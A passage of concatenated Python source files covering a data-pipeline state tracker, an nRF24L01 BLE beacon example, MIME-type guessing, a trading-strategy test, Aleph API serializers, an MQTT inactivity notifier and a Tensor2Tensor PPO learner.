mark_stage_done(user_id, ps.PipelineStages.CLEAN_RESAMPLING,
last_section_done.data.enter_ts + END_FUZZ_AVOID_LTE)
def mark_clean_resampling_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
def get_time_range_for_mode_inference(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.MODE_INFERENCE)
tq.timeType = "data.end_ts"
return tq
def mark_mode_inference_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_mode_inference_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.MODE_INFERENCE)
def get_time_range_for_output_gen(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.OUTPUT_GEN)
def mark_output_gen_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.OUTPUT_GEN, None)
else:
mark_stage_done(user_id, ps.PipelineStages.OUTPUT_GEN,
last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_output_gen_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.OUTPUT_GEN)
def mark_stage_done(user_id, stage, last_processed_ts):
# We move failed entries to the error timeseries. So usercache runs never fail.
curr_state = get_current_state(user_id, stage)
assert(curr_state is not None)
assert(curr_state.curr_run_ts is not None)
curr_state.last_ts_run = curr_state.curr_run_ts
# It is incorrect to assume that we have processed all the data until the
# start of the last run. In particular, due to network connectivity or
# other issues, it is possible that there is outstanding data on phones
# that was collected before the last run started. And if we set this, then
# that data will simply be skipped. The same logic applies to all
# decorators that are based on client collected data (trip start ts, etc) -
# it is only accurate for server generated data. So for maximum generality,
# let's allow the stage to pass in last_processed_ts.
if last_processed_ts is not None:
logging.info("For stage %s, last_ts_processed = %s" %
(stage, pydt.datetime.utcfromtimestamp(last_processed_ts).isoformat()))
curr_state.last_processed_ts = last_processed_ts
else:
logging.info("For stage %s, last_ts_processed is unchanged" % stage)
curr_state.curr_run_ts = None
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
def mark_stage_failed(user_id, stage):
curr_state = get_current_state(user_id, stage)
assert(curr_state is not None)
assert(curr_state.curr_run_ts is not None)
# last_ts_run remains unchanged since this run did not succeed
# the next query will start from the start_ts of this run
# we also reset the curr_run_ts to indicate that we are not currently running
curr_state.curr_run_ts = None
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
def get_time_range_for_stage(user_id, stage):
"""
Returns the start ts and the end ts of the entries in the stage
"""
curr_state = get_current_state(user_id, stage)
if curr_state is None:
start_ts = None
curr_state = ps.PipelineState()
curr_state.user_id = user_id
curr_state.pipeline_stage = stage
curr_state.curr_run_ts = None
curr_state.last_processed_ts = None
curr_state.last_ts_run = None
else:
start_ts = curr_state.last_processed_ts
if start_ts is None:
logging.info("For stage %s, start_ts is None" % stage)
else:
logging.info("For stage %s, start_ts = %s" % (stage, pydt.datetime.utcfromtimestamp(start_ts).isoformat()))
assert curr_state.curr_run_ts is None, "curr_state.curr_run_ts = %s" % curr_state.curr_run_ts
# Let's pick a point 5 secs in the past. If we don't do this, then we will
# read all entries upto the current ts and this may lead to lost data. For
# example, let us say that the current ts is t1. At the time that we read
# the data, we have 4 entries for t1. By the time we finish copying, we
# have 6 entries for t1, we will end up deleting all 6, which will lose 2
# entries.
end_ts = time.time() - END_FUZZ_AVOID_LTE
ret_query = estt.TimeQuery("metadata.write_ts", start_ts, end_ts)
curr_state.curr_run_ts = end_ts
logging.debug("About to save object %s" % curr_state)
edb.save(edb.get_pipeline_state_db(), curr_state)
logging.debug("After saving state %s, list is %s" % (curr_state,
list(edb.get_pipeline_state_db().find({"user_id": user_id}))))
return ret_query
def get_current_state(user_id, stage):
curr_state_doc = edb.get_pipeline_state_db().find_one({"user_id": user_id,
"pipeline_stage": stage.value})
logging.debug("returning curr_state_doc %s for stage %s " % (curr_state_doc, stage))
if curr_state_doc is not None:
return ps.PipelineState(curr_state_doc)
else:
return None
|
the-stack_106_14816
|
"""
This example uses the nRF24L01 as a 'fake' BLE Beacon
.. warning:: ATSAMD21 M0-based boards have memory allocation
error when loading 'fake_ble.mpy'
"""
import time
import board
import digitalio
from circuitpython_nrf24l01.fake_ble import (
chunk,
FakeBLE,
UrlServiceData,
BatteryServiceData,
TemperatureServiceData,
)
# change these (digital output) pins accordingly
ce = digitalio.DigitalInOut(board.D4)
csn = digitalio.DigitalInOut(board.D5)
# using board.SPI() automatically selects the MCU's
# available SPI pins, board.SCK, board.MOSI, board.MISO
spi = board.SPI() # init spi bus object
# initialize the nRF24L01 on the spi bus object as a BLE compliant radio
nrf = FakeBLE(spi, csn, ce)
# the name parameter is going to be its broadcasted BLE name
# this can be changed at any time using the `name` attribute
# nrf.name = b"foobar"
# you can optionally set the arbitrary MAC address to be used as the
# BLE device's MAC address. Otherwise this is randomly generated upon
# instantiation of the FakeBLE object.
# nrf.mac = b"\x19\x12\x14\x26\x09\xE0"
# set the Power Amplifier level to -12 dBm since this test example is
# usually run with nRF24L01 transceiver in close proximity to the
# BLE scanning application
nrf.pa_level = -12
def _prompt(remaining):
if remaining % 5 == 0 or remaining < 5:
if remaining - 1:
print(remaining, "advertisments left to go!")
else:
print(remaining, "advertisment left to go!")
# create an object for manipulating the battery level data
battery_service = BatteryServiceData()
# battery level data is 1 unsigned byte representing a percentage
battery_service.data = 85
def master(count=50):
"""Sends out the device information."""
# using the "with" statement is highly recommended if the nRF24L01 is
# to be used for more than a BLE configuration
with nrf as ble:
ble.name = b"nRF24L01"
# include the radio's pa_level attribute in the payload
ble.show_pa_level = True
print(
"available bytes in next payload:",
ble.len_available(chunk(battery_service.buffer)),
) # using chunk() gives an accurate estimate of available bytes
for i in range(count): # advertise data this many times
if ble.len_available(chunk(battery_service.buffer)) >= 0:
_prompt(count - i) # something to show that it isn't frozen
# broadcast the device name, MAC address, &
# battery charge info; 0x16 means service data
ble.advertise(battery_service.buffer, data_type=0x16)
# channel hoping is recommended per BLE specs
ble.hop_channel()
time.sleep(0.5) # wait till next broadcast
# nrf.show_pa_level & nrf.name both are set to false when
# exiting a with statement block
# create an object for manipulating temperature measurements
temperature_service = TemperatureServiceData()
# temperature's float data has up to 2 decimal places of percision
temperature_service.data = 42.0
def send_temp(count=50):
"""Sends out a fake temperature."""
with nrf as ble:
ble.name = b"nRF24L01"
print(
"available bytes in next payload:",
ble.len_available(chunk(temperature_service.buffer)),
)
for i in range(count):
if ble.len_available(chunk(temperature_service.buffer)) >= 0:
_prompt(count - i)
# broadcast a temperature measurement; 0x16 means service data
ble.advertise(temperature_service.buffer, data_type=0x16)
ble.hop_channel()
time.sleep(0.2)
# use the Eddystone protocol from Google to broadcast a URL as
# service data. We'll need an object to manipulate that also
url_service = UrlServiceData()
# the data attribute converts a URL string into a simplified
# bytes object using byte codes defined by the Eddystone protocol.
url_service.data = "http://www.google.com"
# Eddystone protocol requires an estimated TX PA level at 1 meter
# lower this estimate since we lowered the actual `ble.pa_level`
url_service.pa_level_at_1_meter = -45 # defaults to -25 dBm
def send_url(count=50):
"""Sends out a URL."""
with nrf as ble:
print(
"available bytes in next payload:",
ble.len_available(chunk(url_service.buffer)),
)
# NOTE we did NOT set a device name in this with block
for i in range(count):
# URLs easily exceed the nRF24L01's max payload length
if ble.len_available(chunk(url_service.buffer)) >= 0:
_prompt(count - i)
ble.advertise(url_service.buffer, 0x16)
ble.hop_channel()
time.sleep(0.2)
def set_role():
"""Set the role using stdin stream. Count arg for all functions can be
specified using a space delimiter (e.g. 'T 10' calls `send_temp(10)`)
:return:
- True when role is complete & app should continue running.
- False when app should exit
"""
user_input = (
input(
"*** Enter 'M' to broadcast the device name, pa_level, & battery"
" charge.\n"
"*** Enter 'T' to broadcast the device name & a temperature\n"
"*** Enter 'U' to broadcast a custom URL link\n"
"*** Enter 'Q' to quit example.\n"
)
or "?"
)
user_input = user_input.split()
if user_input[0].upper().startswith("M"):
if len(user_input) > 1:
master(int(user_input[1]))
else:
master()
return True
if user_input[0].upper().startswith("T"):
if len(user_input) > 1:
send_temp(int(user_input[1]))
else:
send_temp()
return True
if user_input[0].upper().startswith("U"):
if len(user_input) > 1:
send_url(int(user_input[1]))
else:
send_url()
return True
if user_input[0].upper().startswith("Q"):
nrf.power = False
return False
print(user_input[0], "is an unrecognized input. Please try again.")
return set_role()
print(" nRF24L01 fake BLE beacon test")
if __name__ == "__main__":
try:
while set_role():
pass # continue example until 'Q' is entered
except KeyboardInterrupt:
print(" Keyboard Interrupt detected. Powering down radio...")
nrf.power = False
else:
print(
" Run master() to broadcast the device name, pa_level, & battery "
"charge\n Run send_temp() to broadcast the device name & a "
"temperature\n Run send_url() to broadcast a custom URL link"
)
|
the-stack_106_14818
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# There's a zope.contenttype module that exports a similar API,
# but that's pretty hueristic. Some of this should perhaps be folded
# back into that, or this package could provide a replacement.
#
import mimetypes
import codecs
from zope import interface
from zope.mimetype import interfaces
import zope.contenttype.parse
def mimeTypeGetter(name=None, data=None, content_type=None):
"""A minimal extractor that never attempts to guess."""
if name is None and data is None and content_type is None:
return None
if content_type:
try:
major, minor, _params = zope.contenttype.parse.parseOrdered(
content_type)
except ValueError:
pass
else:
return "%s/%s" % (major, minor)
return None
interface.directlyProvides(mimeTypeGetter, interfaces.IMimeTypeGetter)
def mimeTypeGuesser(name=None, data=None, content_type=None):
"""An extractor that tries to guess the content type based on the
name and data if the input contains no content type information.
"""
if name is None and data is None and content_type is None:
return None
mimeType = mimeTypeGetter(name=name, data=data, content_type=content_type)
if name and not mimeType:
mimeType, _encoding = mimetypes.guess_type(name, strict=True)
if not mimeType:
mimeType, _encoding = mimetypes.guess_type(name, strict=False)
#
# XXX If `encoding` is not None, we should re-consider the
# guess, since the encoding here is Content-Encoding, not
# charset. In particular, things like .tar.gz map to
# ('application/x-tar', 'gzip'), which may require different
# handling, or at least a separate content-type.
if data and not mimeType:
# no idea, really, but let's sniff a few common things:
for prefix, sniffed_type, _charset in _prefix_table:
if data.startswith(prefix):
mimeType = sniffed_type
break
return mimeType
interface.directlyProvides(mimeTypeGuesser, interfaces.IMimeTypeGetter)
def smartMimeTypeGuesser(name=None, data=None, content_type=None):
"""An extractor that checks the content for a variety of
constructs to try and refine the results of the
`mimeTypeGuesser()`. This is able to do things like check for
XHTML that's labelled as HTML in upload data.
"""
mimeType = mimeTypeGuesser(name=name, data=data, content_type=content_type)
if data and mimeType == "text/html":
for prefix, _mimetype, _charset in _xml_prefix_table:
if data.startswith(prefix):
# don't use text/xml from the table, but take
# advantage of the text/html hint (from the upload
# or mimetypes.guess_type())
mimeType = "application/xhtml+xml"
break
return mimeType
interface.directlyProvides(smartMimeTypeGuesser, interfaces.IMimeTypeGetter)
# Very simple magic numbers table for a few things we want to be good
# at identifying even if we get no help from the input:
#
_xml_prefix_table = (
# prefix, mimeType, charset
(b"<?xml", "text/xml", None),
(b"\xef\xbb\xbf<?xml", "text/xml", "utf-8"), # w/ BOM
(b"\0<\0?\0x\0m\0l", "text/xml", "utf-16be"),
(b"<\0?\0x\0m\0l\0", "text/xml", "utf-16le"),
(b"\xfe\xff\0<\0?\0x\0m\0l", "text/xml", "utf-16be"), # w/ BOM
(b"\xff\xfe<\0?\0x\0m\0l\0", "text/xml", "utf-16le"), # w/ BOM
)
_prefix_table = _xml_prefix_table + (
(b"<html", "text/html", None),
(b"<HTML", "text/html", None),
(b"GIF89a", "image/gif", None),
# PNG Signature: bytes 137 80 78 71 13 10 26 10
(b"\x89PNG\r\n\x1a\n", "image/png", None),
)
def charsetGetter(name=None, data=None, content_type=None):
"""Default implementation of `zope.mimetype.interfaces.ICharsetGetter`."""
if name is None and data is None and content_type is None:
return None
if content_type:
try:
major, minor, params = zope.contenttype.parse.parse(content_type)
except ValueError:
pass
else:
if params.get("charset"):
return params["charset"].lower()
if data:
if data.startswith(codecs.BOM_UTF16_LE):
return 'utf-16le'
elif data.startswith(codecs.BOM_UTF16_BE):
return 'utf-16be'
try:
data.decode('ascii')
return 'ascii'
except UnicodeDecodeError:
try:
data.decode('utf-8')
return 'utf-8'
except UnicodeDecodeError:
pass
return None
interface.directlyProvides(charsetGetter, interfaces.ICharsetGetter)
|
the-stack_106_14819
|
from jesse.strategies import Strategy
import jesse.helpers as jh
class TestAverageEntryPriceProperty(Strategy):
def should_long(self):
return self.price in [1, 5, 10]
def update_position(self) -> None:
if self.price in [3, 7]:
self.liquidate()
def go_long(self):
if self.price == 1:
self.buy = [
(1, 2),
(1, 3),
]
if self.price == 5:
self.buy = [
(1, 5),
(1, 7),
]
if self.price == 10:
self.buy = [
(1, 12),
(1, 13),
]
def before(self) -> None:
# when both orders have been filled
if self.price == 3:
assert self.average_entry_price == 2.5
# when only one order has been filled
if self.price == 6:
assert self.average_entry_price == 6
# when no orders have been filled
if self.price == 11:
assert self.average_entry_price == 12.5
def should_cancel(self):
return False
def should_short(self):
return False
def go_short(self):
pass
|
the-stack_106_14822
|
import logging
# from pprint import pprint
from flask import request
from normality import stringify
from pantomime.types import PDF, CSV
from banal import ensure_list, is_listish, is_mapping, first
from followthemoney import model
from followthemoney.types import registry
from followthemoney.helpers import entity_filename
from aleph.core import url_for
from aleph.model import Role, Collection, Document, Entity, Events, Alert
from aleph.logic import resolver
from aleph.logic.util import collection_url, entity_url, archive_url
from aleph.views.util import jsonify
log = logging.getLogger(__name__)
class Serializer(object):
def __init__(self, reference=False):
self.reference = reference
def _collect(self, obj):
pass
def _serialize(self, obj):
return obj
def queue(self, clazz, key, schema=None):
if not self.reference:
resolver.queue(request, clazz, key, schema=schema)
def resolve(self, clazz, key, serializer=None):
if self.reference:
return
data = resolver.get(request, clazz, key)
if data is not None and serializer is not None:
serializer = serializer(reference=True)
data = serializer.serialize(data)
return data
def serialize(self, obj):
obj = self._to_dict(obj)
if obj is not None:
self._collect(obj)
resolver.resolve(request)
return self._serialize(obj)
def serialize_many(self, objs):
collected = []
for obj in ensure_list(objs):
obj = self._to_dict(obj)
if obj is not None:
self._collect(obj)
collected.append(obj)
resolver.resolve(request)
serialized = []
for obj in collected:
obj = self._serialize(obj)
if obj is not None:
serialized.append(obj)
return serialized
def _to_dict(self, obj):
if hasattr(obj, 'to_dict'):
obj = obj.to_dict()
if hasattr(obj, '_asdict'):
obj = obj._asdict()
return obj
def _clean_response(self, data):
"""Remove unset values from the response to save some bandwidth."""
if is_mapping(data):
out = {}
for k, v in data.items():
v = self._clean_response(v)
if v is not None:
out[k] = v
return out if len(out) else None
elif is_listish(data):
data = [self._clean_response(d) for d in data]
data = [d for d in data if d is not None]
return data if len(data) else None
elif isinstance(data, str):
return data if len(data) else None
return data
@classmethod
def jsonify(cls, obj, **kwargs):
data = cls().serialize(obj)
return jsonify(data, **kwargs)
@classmethod
def jsonify_result(cls, result, extra=None, **kwargs):
data = result.to_dict(serializer=cls)
if extra is not None:
data.update(extra)
return jsonify(data, **kwargs)
class RoleSerializer(Serializer):
def _serialize(self, obj):
obj['id'] = str(obj.get('id'))
obj['links'] = {
'self': url_for('roles_api.view', id=obj.get('id'))
}
obj['writeable'] = request.authz.can_write_role(obj.get('id'))
if not obj['writeable']:
obj.pop('has_password', None)
obj.pop('is_muted', None)
obj.pop('is_tester', None)
obj.pop('is_blocked', None)
obj.pop('api_key', None)
obj.pop('email', None)
obj.pop('created_at', None)
obj.pop('updated_at', None)
if obj['type'] != Role.USER:
obj.pop('api_key', None)
obj.pop('email', None)
obj.pop('locale', None)
obj.pop('password', None)
return self._clean_response(obj)
class AlertSerializer(Serializer):
# def _collect(self, obj):
# self.queue(Role, obj.get('role_id'))
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
obj['links'] = {
'self': url_for('alerts_api.view', alert_id=pk)
}
role_id = obj.pop('role_id', None)
obj['writeable'] = role_id == stringify(request.authz.id)
# obj['role'] = self.resolve(Role, role_id, RoleSerializer)
return obj
class CollectionSerializer(Serializer):
def _collect(self, obj):
self.queue(Role, obj.get('creator_id'))
for role_id in ensure_list(obj.get('team_id')):
self.queue(Role, role_id)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
obj['links'] = {
'self': url_for('collections_api.view', collection_id=pk),
'xref': url_for('xref_api.index', collection_id=pk),
'xref_export': url_for('xref_api.export', collection_id=pk,
_authorize=obj.get('secret')),
'reconcile': url_for('reconcile_api.reconcile',
collection_id=pk,
_authorize=obj.get('secret')),
'ui': collection_url(pk)
}
obj['writeable'] = request.authz.can(pk, request.authz.WRITE)
creator_id = obj.pop('creator_id', None)
obj['creator'] = self.resolve(Role, creator_id, RoleSerializer)
team_id = ensure_list(obj.pop('team_id', []))
if obj['writeable']:
obj['team'] = []
for role_id in team_id:
role = self.resolve(Role, role_id, RoleSerializer)
if role is not None:
obj['team'].append(role)
obj.pop('_index', None)
return self._clean_response(obj)
class PermissionSerializer(Serializer):
def _collect(self, obj):
self.queue(Role, obj.get('role_id'))
def _serialize(self, obj):
obj.pop('collection_id', None)
role_id = obj.pop('role_id', None)
obj['role'] = self.resolve(Role, role_id, RoleSerializer)
return obj
class EntitySerializer(Serializer):
def _collect(self, obj):
self.queue(Collection, obj.get('collection_id'))
self.queue(Role, obj.get('uploader_id'))
schema = model.get(obj.get('schema'))
if schema is None:
return
properties = obj.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
for value in values:
self.queue(Entity, value, prop.range)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
authz = request.authz
collection_id = obj.pop('collection_id', None)
obj['collection'] = self.resolve(Collection, collection_id,
CollectionSerializer)
proxy = model.get_proxy(obj)
obj['schemata'] = proxy.schema.names
properties = obj.get('properties', {})
for prop in proxy.iterprops():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, EntitySerializer)
properties[prop.name].append(entity)
links = {
'self': url_for('entities_api.view', entity_id=pk),
'references': url_for('entities_api.references', entity_id=pk),
'tags': url_for('entities_api.tags', entity_id=pk),
'ui': entity_url(pk)
}
if proxy.schema.is_a(Document.SCHEMA):
links['content'] = url_for('entities_api.content', entity_id=pk)
content_hash = first(properties.get('contentHash'))
if content_hash:
name = entity_filename(proxy)
mime_type = first(properties.get('mimeType'))
links['file'] = archive_url(request.authz.id, content_hash,
file_name=name,
mime_type=mime_type)
pdf_hash = first(properties.get('pdfHash'))
if pdf_hash:
name = entity_filename(proxy, extension='pdf')
links['pdf'] = archive_url(request.authz.id, pdf_hash,
file_name=name, mime_type=PDF)
csv_hash = first(properties.get('csvHash'))
if csv_hash:
name = entity_filename(proxy, extension='csv')
links['csv'] = archive_url(request.authz.id, csv_hash,
file_name=name, mime_type=CSV)
obj['links'] = links
obj['writeable'] = authz.can(collection_id, authz.WRITE)
obj.pop('_index', None)
return self._clean_response(obj)
class MatchCollectionsSerializer(Serializer):
def _serialize(self, obj):
serializer = CollectionSerializer(reference=True)
obj['collection'] = serializer.serialize(obj.get('collection'))
return obj
class MatchSerializer(Serializer):
def _collect(self, obj):
matchable = tuple([s.matchable for s in model])
self.queue(Entity, obj.get('entity_id'), matchable)
self.queue(Entity, obj.get('match_id'), matchable)
def _serialize(self, obj):
obj['id'] = str(obj['id'])
entity_id = obj.pop('entity_id', None)
obj['entity'] = self.resolve(Entity, entity_id, EntitySerializer)
match_id = obj.pop('match_id', None)
obj['match'] = self.resolve(Entity, match_id, EntitySerializer)
if obj['entity'] and obj['match']:
return obj
class QueryLogSerializer(Serializer):
pass
class NotificationSerializer(Serializer):
SERIALIZERS = {
Alert: AlertSerializer,
Entity: EntitySerializer,
Collection: CollectionSerializer,
Role: RoleSerializer
}
def _collect(self, obj):
self.queue(Role, obj.get('actor_id'))
event = Events.get(obj.get('event'))
for name, clazz in event.params.items():
key = obj.get('params', {}).get(name)
self.queue(clazz, key, Entity.THING)
def _serialize(self, obj):
obj['id'] = str(obj['id'])
event = Events.get(obj.get('event'))
params = {
'actor': self.resolve(Role, obj.get('actor_id'), RoleSerializer)
}
for name, clazz in event.params.items():
key = obj.get('params', {}).get(name)
serializer = self.SERIALIZERS.get(clazz)
params[name] = self.resolve(clazz, key, serializer)
obj['params'] = params
obj['event'] = event.to_dict()
return obj
class MappingSerializer(Serializer):
pass
class DiagramEntitySerializer(EntitySerializer):
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
schema = model.get(obj.get('schema'))
if schema is None:
return None
properties = obj.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
if values:
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, DiagramEntitySerializer) # noqa
if entity is None:
entity = value
properties[prop.name].append(entity)
obj.pop('_index', None)
collection_id = obj.pop('collection_id', None)
obj['collection_id'] = str(collection_id)
return self._clean_response(obj)
class DiagramSerializer(Serializer):
def _collect(self, obj):
self.queue(Collection, obj.get('collection_id'))
ent_ids = obj['entities']
for ent_id in ensure_list(ent_ids):
self.queue(Entity, ent_id)
def _serialize(self, obj):
pk = obj.get('id')
obj['id'] = str(pk)
collection_id = obj.pop('collection_id', None)
obj['writeable'] = request.authz.can(collection_id, request.authz.WRITE) # noqa
obj['collection'] = self.resolve(Collection, collection_id, CollectionSerializer) # noqa
ent_ids = obj.pop('entities')
obj['entities'] = []
for ent_id in ent_ids:
entity = self.resolve(Entity, ent_id, DiagramEntitySerializer)
if entity is not None:
obj['entities'].append(entity)
for ent in obj['entities']:
schema = model.get(ent.get('schema'))
properties = ent.get('properties', {})
for prop in schema.properties.values():
if prop.type != registry.entity:
continue
values = ensure_list(properties.get(prop.name))
if values:
properties[prop.name] = []
for value in values:
entity = self.resolve(Entity, value, DiagramEntitySerializer) # noqa
properties[prop.name].append(entity)
return self._clean_response(obj)
|
the-stack_106_14825
|
#!/usr/bin/env python
import paho.mqtt.client as mqtt
import numpy as np
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe("test/#")
def on_message(client, userdata, msg):
global count
count = float(msg.payload)
check_payload()
def generate_condition(arr):
"""
The function generates if else condition based on the frequency of notifications.
The if condition always begins with the largest inactivity. The last elif is therefore a condition,
using the smallest inactivity, the user need to be aware of. The position of each element as well as the
array length is used to assign values for flag. The smallest inactivity i.e the last elseif must assign False
to boolean variable. This boolean variable is inverted as we move towards the top of the if statement.
"""
code = """"""
for i, j in enumerate(arr):
if i == 0:
text = 'if count > ' + str(j) + ':\n'
if len(arr) % 2 == 0:
text += ' flip('+str((i+1) % 2 != 0)+')\n'
else:
text += ' flip('+str((i+1) % 2 == 0)+')\n'
else:
text = 'elif count > ' + str(j) + ':\n'
if len(arr) % 2 == 0:
text += ' flip('+str((i+1) % 2 != 0)+')\n'
else:
text += ' flip('+str((i+1) % 2 == 0)+')\n'
code += text
return code
def exec_payload():
"""
Function that operates on the reported inactivity payload.
Can be used for printing, telegram alerting, etc.
"""
global count
unit = 'minutes' if count < 1 else 'hours'
value = count*60 if count < 1 else count
print('The elevator is inactive for the last %s %s' %(value, unit))
def flip(var):
"""
Once the if else condition is satisfied, the current flag is inverted.
This is to ensure that we only get a single notification, each time a condition is passed.
"""
global flag
if flag == var:
exec_payload()
flag = not var
def check_payload():
"""
Executes the code generated from generate_condition().
The if else constrains are passed as parameters.
"""
arr = [44/60, 0.99, 1.99, 2.99, 3.99, 7.99, 9.99]
code = generate_condition(arr[::-1]) # we pass the array in descending order, eg: [24 hrs, 12hrs, 6hrs, 3hrs]
exec(code)
if 'flag' not in globals():
flag = False
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("localhost", 1883, 60)
client.loop_forever()
|
the-stack_106_14826
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PPO learner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
from tensor2tensor.layers import common_layers
from tensor2tensor.models.research.rl import get_policy
from tensor2tensor.rl import ppo
from tensor2tensor.rl.envs.tf_atari_wrappers import StackWrapper
from tensor2tensor.rl.envs.tf_atari_wrappers import WrapperBase
from tensor2tensor.rl.policy_learner import PolicyLearner
from tensor2tensor.rl.restarter import Restarter
from tensor2tensor.utils import trainer_lib
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
class PPOLearner(PolicyLearner):
"""PPO for policy learning."""
def __init__(self, frame_stack_size, base_event_dir, agent_model_dir,
total_num_epochs, **kwargs):
super(PPOLearner, self).__init__(
frame_stack_size, base_event_dir, agent_model_dir, total_num_epochs)
self._num_completed_iterations = 0
self._lr_decay_start = None
self._distributional_size = kwargs.get("distributional_size", 1)
self._distributional_subscale = kwargs.get("distributional_subscale", 0.04)
self._distributional_threshold = kwargs.get("distributional_threshold", 0.0)
def train(self,
env_fn,
hparams,
simulated,
save_continuously,
epoch,
sampling_temp=1.0,
num_env_steps=None,
env_step_multiplier=1,
eval_env_fn=None,
report_fn=None,
model_save_fn=None):
assert sampling_temp == 1.0 or hparams.learning_rate == 0.0, \
"Sampling with non-1 temperature does not make sense during training."
if not save_continuously:
# We do not save model, as that resets frames that we need at restarts.
# But we need to save at the last step, so we set it very high.
hparams.save_models_every_epochs = 1000000
if simulated:
simulated_str = "sim"
else:
simulated_str = "real"
name_scope = "ppo_{}{}".format(simulated_str, epoch + 1)
event_dir = os.path.join(self.base_event_dir, "ppo_summaries",
str(epoch) + simulated_str)
with tf.Graph().as_default():
with tf.name_scope(name_scope):
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
env = env_fn(in_graph=True)
(train_summary_op, eval_summary_op, initializers) = (
_define_train(
env,
hparams,
eval_env_fn,
sampling_temp,
distributional_size=self._distributional_size,
distributional_subscale=self._distributional_subscale,
distributional_threshold=self._distributional_threshold,
epoch=epoch if simulated else -1,
frame_stack_size=self.frame_stack_size,
force_beginning_resets=simulated))
if num_env_steps is None:
iteration_increment = hparams.epochs_num
else:
iteration_increment = int(
math.ceil(
num_env_steps / (env.batch_size * hparams.epoch_length)))
iteration_increment *= env_step_multiplier
self._num_completed_iterations += iteration_increment
restarter = Restarter(
"policy", self.agent_model_dir, self._num_completed_iterations
)
if restarter.should_skip:
return
if hparams.lr_decay_in_final_epoch:
if epoch != self.total_num_epochs - 1:
# Extend the warmup period to the end of this epoch.
hparams.learning_rate_warmup_steps = restarter.target_global_step
else:
if self._lr_decay_start is None:
# Stop the warmup at the beginning of this epoch.
self._lr_decay_start = \
restarter.target_global_step - iteration_increment
hparams.learning_rate_warmup_steps = self._lr_decay_start
_run_train(
hparams,
event_dir,
self.agent_model_dir,
restarter,
train_summary_op,
eval_summary_op,
initializers,
epoch,
report_fn=report_fn,
model_save_fn=model_save_fn)
def evaluate(self, env_fn, hparams, sampling_temp):
with tf.Graph().as_default():
with tf.name_scope("rl_eval"):
eval_env = env_fn(in_graph=True)
(collect_memory, _, collect_init) = _define_collect(
eval_env,
hparams,
"ppo_eval",
eval_phase=True,
frame_stack_size=self.frame_stack_size,
force_beginning_resets=False,
sampling_temp=sampling_temp,
distributional_size=self._distributional_size,
)
model_saver = tf.train.Saver(
tf.global_variables(hparams.policy_network + "/.*")
# tf.global_variables("clean_scope.*") # Needed for sharing params.
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
collect_init(sess)
trainer_lib.restore_checkpoint(self.agent_model_dir, model_saver,
sess)
sess.run(collect_memory)
def _define_train(
train_env,
ppo_hparams,
eval_env_fn=None,
sampling_temp=1.0,
distributional_size=1,
distributional_subscale=0.04,
distributional_threshold=0.0,
epoch=-1,
**collect_kwargs
):
"""Define the training setup."""
memory, collect_summary, train_initialization = (
_define_collect(
train_env,
ppo_hparams,
"ppo_train",
eval_phase=False,
sampling_temp=sampling_temp,
distributional_size=distributional_size,
**collect_kwargs))
ppo_summary = ppo.define_ppo_epoch(
memory, ppo_hparams, train_env.action_space, train_env.batch_size,
distributional_size=distributional_size,
distributional_subscale=distributional_subscale,
distributional_threshold=distributional_threshold,
epoch=epoch)
train_summary = tf.summary.merge([collect_summary, ppo_summary])
if ppo_hparams.eval_every_epochs:
# TODO(koz4k): Do we need this at all?
assert eval_env_fn is not None
eval_env = eval_env_fn(in_graph=True)
(_, eval_collect_summary, eval_initialization) = (
_define_collect(
eval_env,
ppo_hparams,
"ppo_eval",
eval_phase=True,
sampling_temp=0.0,
distributional_size=distributional_size,
